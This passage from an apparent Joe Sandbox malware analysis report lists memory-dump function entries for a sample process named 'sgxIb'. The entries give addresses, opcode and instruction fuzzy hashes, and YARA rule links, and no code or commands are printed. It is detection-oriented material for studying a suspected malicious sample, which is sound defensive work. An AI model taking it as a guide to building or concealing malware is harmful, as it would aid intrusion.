                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4cdf466b5cf30c15180721a6ade74d76bb1339d8c4d3780f9701f5c4d5901efd
                                                    • Instruction ID: 72c65d5d0ddac7bb33e405d5d3002528269527e48fdbdc493a108a83a40dd7ea
                                                    • Opcode Fuzzy Hash: 4cdf466b5cf30c15180721a6ade74d76bb1339d8c4d3780f9701f5c4d5901efd
                                                    • Instruction Fuzzy Hash: 50518CB07006058FCB25EB79C484BAAB7FAEF89354F144569E40ACB3A0DB71EC85CB51
                                                    Function 077B3518 Relevance: .1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8bb0dfd95300135d4a76a348ad0b4034c73eaca67f9a82d6edb115575da15d94
                                                    • Instruction ID: 042e4ca8a07fc926c11b1e6f203540174104277f986a5ca0cfac5c4bba4eb7bc
                                                    • Opcode Fuzzy Hash: 8bb0dfd95300135d4a76a348ad0b4034c73eaca67f9a82d6edb115575da15d94
                                                    • Instruction Fuzzy Hash: 92418BB0700205DFCB24DF69C494BA9BBBAEF89344F144569E40ADB3A0DB71EC85CB51
                                                    Function 077BC140 Relevance: .1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08b8a1440ba6f8403f14c82ecc4a85c24ab61e1824f6441650d5a4fbfe6885e1
                                                    • Instruction ID: a34af8bf0a2cce2f71c476cca5c9e2d19700137a3c0f966ae7650116073b9dcc
                                                    • Opcode Fuzzy Hash: 08b8a1440ba6f8403f14c82ecc4a85c24ab61e1824f6441650d5a4fbfe6885e1
                                                    • Instruction Fuzzy Hash: F64154B0300605DFDB35DB65C884BBAB3A6BF85350F148969D1458B3A0CB75AC46CBA2
                                                    Function 077B5DE8 Relevance: .1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5064baf5c5afd8456d195fd843b848597857502559197888d79243a3e208bf68
                                                    • Instruction ID: 4b952392828c5cad4d7e6ddfc5b44d02ddb2a56cfdc89d86170faca9372b7dea
                                                    • Opcode Fuzzy Hash: 5064baf5c5afd8456d195fd843b848597857502559197888d79243a3e208bf68
                                                    • Instruction Fuzzy Hash: 1141E3B17016019FCB35DA68D9047FAB7E6EF88350F14886ED41ACB390CB75E856CBA1
                                                    Function 077BC130 Relevance: .1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 820841fe44e8b50fffd471971281f12780bdcf9f6c63d3ee8440f4e3004ed272
                                                    • Instruction ID: ea2190b17c9e5c1c7842ae0bc6d55fe3a5d9f465d1c096a2ccd46b7cbc7ca3b4
                                                    • Opcode Fuzzy Hash: 820841fe44e8b50fffd471971281f12780bdcf9f6c63d3ee8440f4e3004ed272
                                                    • Instruction Fuzzy Hash: A94194B0300605DFDB35DB74C888BBAB3B6BF85350F148969D1458B3A1CB75AC46CBA2
                                                    Function 077B8A70 Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1fff390b0140027b60bb1e270b5777d4d57dc59b80f5dffa7e96e64a03e8d5c4
                                                    • Instruction ID: c52cc5b2c654a4acd45029fe3c0ab3dc0bf096290e2b3c3088bcd1bdbb5448a4
                                                    • Opcode Fuzzy Hash: 1fff390b0140027b60bb1e270b5777d4d57dc59b80f5dffa7e96e64a03e8d5c4
                                                    • Instruction Fuzzy Hash: DA315CB03146119FCB19AB38D45866EBBF6BF89611B144A6DE00AC73A0EF34DD06CB85
                                                    Function 077B8A80 Relevance: .1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b80660e1ab98d961b92f91d01d9418f0341bd5302f298f5305835ed9b0b6a780
                                                    • Instruction ID: 3fec8c84165bee978639d2b407095f35b043604b6c75bbb562c6c9c388eafc89
                                                    • Opcode Fuzzy Hash: b80660e1ab98d961b92f91d01d9418f0341bd5302f298f5305835ed9b0b6a780
                                                    • Instruction Fuzzy Hash: 8E311CB03146119FCB19AB38D45866EBBF6BF89611B144A6DE00AC7390EF34ED06CB95
                                                    Function 077BCCE0 Relevance: .1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 22583f6fd6e08b4e37170622c4d3a9d93cc9c37bd4c8705826e46411dc0944be
                                                    • Instruction ID: 3eb890da50a0ffb6a917662400d2cd82f193f8d370a48aeb51ecc424f2339670
                                                    • Opcode Fuzzy Hash: 22583f6fd6e08b4e37170622c4d3a9d93cc9c37bd4c8705826e46411dc0944be
                                                    • Instruction Fuzzy Hash: D2311CB4300611CFDB74DB29C484BA9B7E6AF89754F158869E406CB362DE31EC45CB50
                                                    Function 077BFD38 Relevance: .1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 826af366c85d80c2f9fc3e97fbdbc7e923c695cd6adfbb1d189e74e25efb8d04
                                                    • Instruction ID: 44c7152c628b136a90e365342c854695cae186392cd0627c9fdba1f76fffc547
                                                    • Opcode Fuzzy Hash: 826af366c85d80c2f9fc3e97fbdbc7e923c695cd6adfbb1d189e74e25efb8d04
                                                    • Instruction Fuzzy Hash: B73148B17002159FCB249F68CC98AA9BBB6FF88720F114669E5258B2B1CB70DD11CB90
                                                    Function 077BFD48 Relevance: .1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eef7570bba84fe4a5c0367675cebebc284b506b3d5f4c26a4c98a63657af06b1
                                                    • Instruction ID: 063627f50e36810a61b2443be5569ff9a04b1e986aa2242bc595c3edcc3ec47f
                                                    • Opcode Fuzzy Hash: eef7570bba84fe4a5c0367675cebebc284b506b3d5f4c26a4c98a63657af06b1
                                                    • Instruction Fuzzy Hash: EA3139757002159FCB249F68CC98AAEBBB6FF89620B104669E5258B3B1CB71DD11CB90
                                                    Function 077B7ED8 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8011252d09dccfaccabbe954b585fb71fc2a399e868e1e394f443275add4f869
                                                    • Instruction ID: 1e8bb4a3bfc0a10543d896f1af317b87f363b44d350204eef6e6eccd5ca81f64
                                                    • Opcode Fuzzy Hash: 8011252d09dccfaccabbe954b585fb71fc2a399e868e1e394f443275add4f869
                                                    • Instruction Fuzzy Hash: 25317370314715CF8B28DB2AD55866DBFF6AFC8651344896AE40AC77A4DF30EC02CB99
                                                    Function 077BD2C0 Relevance: .1, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d11d51fa7012d731005d40bea2da9a896402eecc02184d69062c22269d98e11
                                                    • Instruction ID: 4b14c86bdddf2bd62f5799f8d1474ec14192e621d9c9f9886cb5ff27c236545a
                                                    • Opcode Fuzzy Hash: 8d11d51fa7012d731005d40bea2da9a896402eecc02184d69062c22269d98e11
                                                    • Instruction Fuzzy Hash: 7C3116B4300602CFCB64DB29C484BA973A6AF88754F1588A9E44ACB372DA31E845CB50
                                                    Function 077B6589 Relevance: .1, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d349c869147c46663507e621b2ab2b86e0f7702529a7225bb6c3bb7e14016d36
                                                    • Instruction ID: 8d6f43a88cf7bfca8c299e1f653763990144046595e2278839e429225dd81f36
                                                    • Opcode Fuzzy Hash: d349c869147c46663507e621b2ab2b86e0f7702529a7225bb6c3bb7e14016d36
                                                    • Instruction Fuzzy Hash: 42310675A00600CFC719DF68C484A9ABBF2EF8C364F1584A9D505AB365DB31EC86CB21
                                                    Function 077B4528 Relevance: .1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 95dd9c3ad96b1bfd2563379b595cc3549ff81a7e6ad4bc76765c97c0943fbd3b
                                                    • Instruction ID: 9b6a81f84d2978a6a32ba886ed72938333ba44b2d49ed0c7f195dcfdda653e40
                                                    • Opcode Fuzzy Hash: 95dd9c3ad96b1bfd2563379b595cc3549ff81a7e6ad4bc76765c97c0943fbd3b
                                                    • Instruction Fuzzy Hash: B821D6B57406518FCB24DB7CD444AAD73E9EF8966071144BAE905CB372EE31DC01CBA1
                                                    Function 077B7EC8 Relevance: .1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a07b731a952e3233a4cc13acbaabb79b711edf65186387418c5f2011519b385b
                                                    • Instruction ID: 95e220f54e7bbdb5e0dce9fe19a8775abd6e238199d3d404f7345c05d1edf872
                                                    • Opcode Fuzzy Hash: a07b731a952e3233a4cc13acbaabb79b711edf65186387418c5f2011519b385b
                                                    • Instruction Fuzzy Hash: 0A312D70314611CF8B289B25D459A69BFF6BFC9651745895AE406C77A0DF30EC02CB89
                                                    Function 077BCFC0 Relevance: .1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 99142f635541d0b7f9f24de0de43d171ea45a6f0ce4a0465c9b72db285cbdffd
                                                    • Instruction ID: d18f1f594a4fc69376020f7bf23315611563773fff2fc808b342efc0f9001cc7
                                                    • Opcode Fuzzy Hash: 99142f635541d0b7f9f24de0de43d171ea45a6f0ce4a0465c9b72db285cbdffd
                                                    • Instruction Fuzzy Hash: 1E3130702507018FC764DB28C889FE677A5FF41764F51CA69E55A8B3A1DFB0E88ACB40
                                                    Function 077BDBB8 Relevance: .1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f920da161ec313a7e9c40f5a99719653050d2cb73f614ee166a0b6eb0f16013
                                                    • Instruction ID: 7af4f70b75bee4d00d3deb20e9f977daa67253abc5aa3bea558434e972bdcdf9
                                                    • Opcode Fuzzy Hash: 5f920da161ec313a7e9c40f5a99719653050d2cb73f614ee166a0b6eb0f16013
                                                    • Instruction Fuzzy Hash: F821C2B474431A8F4B3527B985583BE36EB9FC47D07580429D907CB394EE69CC4287DA
                                                    Function 077BD875 Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52c63606bca6c1b0e0ac4574f7e9c4425188838365d3e72edcad422334311294
                                                    • Instruction ID: dfefa555e51aa8a78b2921873c01ccf95e6c2d841c771e98cdd3837184cbc9c4
                                                    • Opcode Fuzzy Hash: 52c63606bca6c1b0e0ac4574f7e9c4425188838365d3e72edcad422334311294
                                                    • Instruction Fuzzy Hash: 5B3105B4B10209CFCB24DB64C544AEDBBF6EF88361F544468D906AB3A4DB35ED81CB60
                                                    Function 077B4ED1 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d8d974583648c0bcf4ea3f848266df11e62b319e0498836eef23d23634954f3
                                                    • Instruction ID: 6320239feee97f80c0de9d8dc080fb0c3eecfdc59bcd8d8eb3f8582f6e34beae
                                                    • Opcode Fuzzy Hash: 0d8d974583648c0bcf4ea3f848266df11e62b319e0498836eef23d23634954f3
                                                    • Instruction Fuzzy Hash: 19316275A04298CFCF25EF64C854AEDBBB2FF49340F1544A9D401AB3A2CB359C01CB61
                                                    Function 0169D4C4 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1837768875.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_169d000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: de5872da7a4952ab9ff7bd342d798550cf97c4d3a208cb56df14af453432fc09
                                                    • Instruction ID: 1d258a5b76d88c80b80f29a624463233a2732bb8dab73e1e373fb096008b1aa8
                                                    • Opcode Fuzzy Hash: de5872da7a4952ab9ff7bd342d798550cf97c4d3a208cb56df14af453432fc09
                                                    • Instruction Fuzzy Hash: D421D0B1504240EFDF05DF58DAC0B2ABF69FB88728F24C579E9094B256C336D456CBA2
                                                    Function 0169D3D8 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1837768875.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_169d000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 81006123e5d9fe83e6bec92ef96b4a3791aff1ed94279306347a4c1e51cc32cb
                                                    • Instruction ID: 65e1e651460380aa53f91fdf8be719dab6cd1669e257c40fd48846d43c628085
                                                    • Opcode Fuzzy Hash: 81006123e5d9fe83e6bec92ef96b4a3791aff1ed94279306347a4c1e51cc32cb
                                                    • Instruction Fuzzy Hash: 3F210671500204DFDF05DF58D9C0B6ABF69FB94724F20C179D9094B356C336E456C6A1
                                                    Function 077BCD24 Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c73a0e190b3b5d8cba6c548c0615766cc868427b5c33b72a284c8df3da9fde5
                                                    • Instruction ID: a2afa87b8706924821201243e302b4fcc044a2f78e188bcaaa85ab09fe5a4d73
                                                    • Opcode Fuzzy Hash: 1c73a0e190b3b5d8cba6c548c0615766cc868427b5c33b72a284c8df3da9fde5
                                                    • Instruction Fuzzy Hash: 5B312A303506018FC764DB28C898BA6B7A6FF85315F5189A9E15ECB365DF71EC8ACB40
                                                    Function 0188D01C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1838059209.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_188d000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d640535668893e075355da081b0a94cecaa4ac79f22cee684f4ab7b070d39c3b
                                                    • Instruction ID: 34453d22f8f4c985f844816fbabfa59b5bd43e4a8c63afb5c081e6c34db60fb0
                                                    • Opcode Fuzzy Hash: d640535668893e075355da081b0a94cecaa4ac79f22cee684f4ab7b070d39c3b
                                                    • Instruction Fuzzy Hash: 6C213471604204DFDB15EF98D9C4B26BFA5FB84318F20C66DD80A8B396C33AD947CA61
                                                    Function 0188D1D4 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1838059209.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_188d000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 609c72fe1ce2b0179306e85549357033facf46e39a2ec509062b3529b6aa75cc
                                                    • Instruction ID: 5c1ed87daabf288eba492c28687e4b768a4f1f2e785bc9975cd9128cd906d19d
                                                    • Opcode Fuzzy Hash: 609c72fe1ce2b0179306e85549357033facf46e39a2ec509062b3529b6aa75cc
                                                    • Instruction Fuzzy Hash: 39210771504204DFDB05EF98D6C0B26BBA5FB84328F20C76DD9098B296C336E546CA61
                                                    Function 077BD460 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aefdb56aa45a31245eb63817183633f554284cbf4fb74962269b046332efff4d
                                                    • Instruction ID: b63fb5616ef6ffbfcaeac945505c7a9cdfdd7b840336a5a2bc0f17b92e9531d9
                                                    • Opcode Fuzzy Hash: aefdb56aa45a31245eb63817183633f554284cbf4fb74962269b046332efff4d
                                                    • Instruction Fuzzy Hash: 27313C303006018FC764DB28D898BA67BE6FF84315F1588A9E44ECB361DF75AC8ACB40
                                                    Function 077BDBA7 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f68b60de8d58a83172356a3c743c4471d603129976ec241fdb11b5938ee0079
                                                    • Instruction ID: 077fc0f81f2ea59d85a82d612a6ccc8924c7ce449524a17fc2a0a2a0f54009d1
                                                    • Opcode Fuzzy Hash: 7f68b60de8d58a83172356a3c743c4471d603129976ec241fdb11b5938ee0079
                                                    • Instruction Fuzzy Hash: 3E1181B47143118F8B352B6994587BE3AAB9FC57D0B09042AE902C7394EE68CC02C7DA
                                                    Function 077B7DA4 Relevance: .1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6f6bcf76c844d21d0b42bad5c16e0e9243ff4a44d81fdf342b7cc564a92ec931
                                                    • Instruction ID: c0aea86367e903ac208e68b8c46fa6b190a7dd904618d4713a7aebb31839580f
                                                    • Opcode Fuzzy Hash: 6f6bcf76c844d21d0b42bad5c16e0e9243ff4a44d81fdf342b7cc564a92ec931
                                                    • Instruction Fuzzy Hash: 7921BE71705244CFCB19CB68D484A99BBB2FF85355B5684EAE8059B722CB31DC01CB90
                                                    Function 077BB4E0 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08b35613a435f833da13d74162ea63fd3e6cf269877129f4e591522263e71762
                                                    • Instruction ID: 8837e9017d21c9edd2c5c0a8e9542a69e8314443b6d1458e1ac017f1ed6f0c34
                                                    • Opcode Fuzzy Hash: 08b35613a435f833da13d74162ea63fd3e6cf269877129f4e591522263e71762
                                                    • Instruction Fuzzy Hash: F4113074B006418FCB29DF39C894A6AF7F2EF89614720866DD0158B3A5CB71EC46CB51
                                                    Function 077BD218 Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f56640b088a24807b033ab60a3a5605f761cd0061febda81b95a05ae37fb60c
                                                    • Instruction ID: a5190049d5afffeaf40ad7778f1f3b0197987b1eef4a8cc793be6576dc91dbff
                                                    • Opcode Fuzzy Hash: 7f56640b088a24807b033ab60a3a5605f761cd0061febda81b95a05ae37fb60c
                                                    • Instruction Fuzzy Hash: 8D119D71300745CFC734AF78C58499ABBB6EF8635171049ADE50ACB370DA31D885CB61
                                                    Function 077BDA2B Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e085557973cb9de4e37c3e03b953c1523d8b6a40aea31e80cd761df2d77b750f
                                                    • Instruction ID: f9ad3b8312fd8251c132aa8a244f4a4ad872b03843d2139a43bb7a482ce70c5a
                                                    • Opcode Fuzzy Hash: e085557973cb9de4e37c3e03b953c1523d8b6a40aea31e80cd761df2d77b750f
                                                    • Instruction Fuzzy Hash: 821106303047518FCB256778D41435E7BE6AF86350F144A69D196CB3D1DF34AC0A8789
                                                    Function 0169D4BF Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1837768875.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_169d000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                    • Instruction ID: e4eedaf71212e0ada354f59693c214d46b2acf049339b3c54ccaa819da678e79
                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                    • Instruction Fuzzy Hash: C311E176404280CFCF02CF54D9C4B16BF71FB84328F24C6A9D8090B256C336D45ACBA1
                                                    Function 0169D3D3 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1837768875.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_169d000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                    • Instruction ID: 8b6aab68098bbd9a4bd2399ff85cc0a0ff9db5d1e3bc0df904b50febaa6ab472
                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                    • Instruction Fuzzy Hash: 8311DC72404280DFDF02CF44D9C4B5ABF72FB94724F24C2A9D9090B256C33AE45ACBA2
                                                    Function 0188D1CF Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1838059209.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_188d000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
